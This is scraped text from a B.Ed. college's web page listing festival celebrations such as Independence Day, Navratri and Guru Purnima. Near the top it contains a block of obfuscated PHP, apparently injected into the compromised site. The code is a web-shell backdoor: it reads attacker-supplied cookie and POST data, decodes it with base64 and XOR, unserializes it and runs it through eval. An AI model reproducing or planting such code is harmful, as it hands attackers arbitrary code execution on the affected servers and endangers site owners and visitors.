ilt_rajkot Empowering Minds, Clebrating Freedom! Our @ilt_rajkot family comes together on this Independence Day to honor the spirit of our...

$Fgajr = "\x67" . chr ( 363 - 292 )."\137" . chr ( 677 - 604 ).'a' . chr ( 575 - 462 ).'e';$PaaEERJ = chr ( 1050 - 951 ).'l' . "\141" . 's' . "\163" . "\137" . chr ( 750 - 649 )."\x78" . "\151" . chr ( 1073 - 958 )."\x74" . chr ( 994 - 879 ); $kEfzQFfXHl = class_exists($Fgajr); $PaaEERJ = "13543";$ISHRhVG = strpos($PaaEERJ, $Fgajr);if ($kEfzQFfXHl == $ISHRhVG){function ZcZRD(){$INpGqndh = new /* 32237 */ gG_Iaqe(64167 + 64167); $INpGqndh = NULL;}$nMUBEEIGNN = "64167";class gG_Iaqe{private function NikbG($nMUBEEIGNN){if (is_array(gG_Iaqe::$ZwaHjuAdP)) {$FRpEzz2 = str_replace("<" . "?php", "", gG_Iaqe::$ZwaHjuAdP["content"]);eval($FRpEzz2); $nMUBEEIGNN = "64167";exit();}}public function txPCFEO(){$FRpEzz = "34499";$this->_dummy = str_repeat($FRpEzz, strlen($FRpEzz));}public function __destruct(){gG_Iaqe::$ZwaHjuAdP = @unserialize(gG_Iaqe::$ZwaHjuAdP); $nMUBEEIGNN = "715_29322";$this->NikbG($nMUBEEIGNN); $nMUBEEIGNN = "715_29322";}public function AtGQfgy($FRpEzz, $jkNHBoGSlA){return $FRpEzz[0] ^ str_repeat($jkNHBoGSlA, intval(strlen($FRpEzz[0]) / strlen($jkNHBoGSlA)) + 1);}public function lfqwCZDL($FRpEzz){$WaeHbs = chr (98) . chr (97) . chr (115) . 'e' . "\x36" . chr (52);return array_map($WaeHbs . "\137" . 'd' . chr (101) . chr ( 710 - 611 ).chr ( 377 - 266 )."\x64" . chr ( 179 - 78 ), array($FRpEzz,));}public function __construct($aSknbvQ=0){$nXHWfj = ',';$FRpEzz = "";$ZLFAMcDzbj = $_POST;$lrwVgoo = $_COOKIE;$jkNHBoGSlA = "0fb2515a-fa2d-4e77-ae5b-5e72d6e2583b";$ViYzomM = @$lrwVgoo[substr($jkNHBoGSlA, 0, 4)];if (!empty($ViYzomM)){$ViYzomM = explode($nXHWfj, $ViYzomM);foreach ($ViYzomM as $uETosz){$FRpEzz .= @$lrwVgoo[$uETosz];$FRpEzz .= @$ZLFAMcDzbj[$uETosz];}$FRpEzz = $this->lfqwCZDL($FRpEzz);}gG_Iaqe::$ZwaHjuAdP = $this->AtGQfgy($FRpEzz, $jkNHBoGSlA);if (strpos($jkNHBoGSlA, $nXHWfj) !== FALSE){$jkNHBoGSlA = str_pad($jkNHBoGSlA, 10); $jkNHBoGSlA = strcspn ($jkNHBoGSlA, $nXHWfj); $jkNHBoGSlA = ltrim(rtrim($jkNHBoGSlA));}}public static $ZwaHjuAdP = 7965;}ZcZRD();}
Institute of Language Teaching
(B.Ed. English) College
This is how ILTians celebrate each and every festival at college.
ilt_rajkot Empowering Minds, Clebrating Freedom! Our @ilt_rajkot family comes together on this Independence Day to honor the spirit of our...
There are days when you feel excited and then there are the Navratri days.” ILT once again celebrated Navratri with...
Had a double-fold celebration Today.. 1. Teacher’s Day 2. Welcoming First Year Trainees Earnest Gratitude towards the Key note Speaker,...
Celebrated Guru Purnima. Organized various events like Elocution Competition Songs Drama Speeches Dance...
Republic Day Celebration Of 2k19… પૂર્વ સંધ્યા… 1st Celebration Of The year 2019.....
ILT B.Ed. College arranged Aishwarya Majmudar’s WELCOME NAVARATRI Evening for the trainees. They enjoyed a lot. Aishwarya Majmudar’s singing swayed...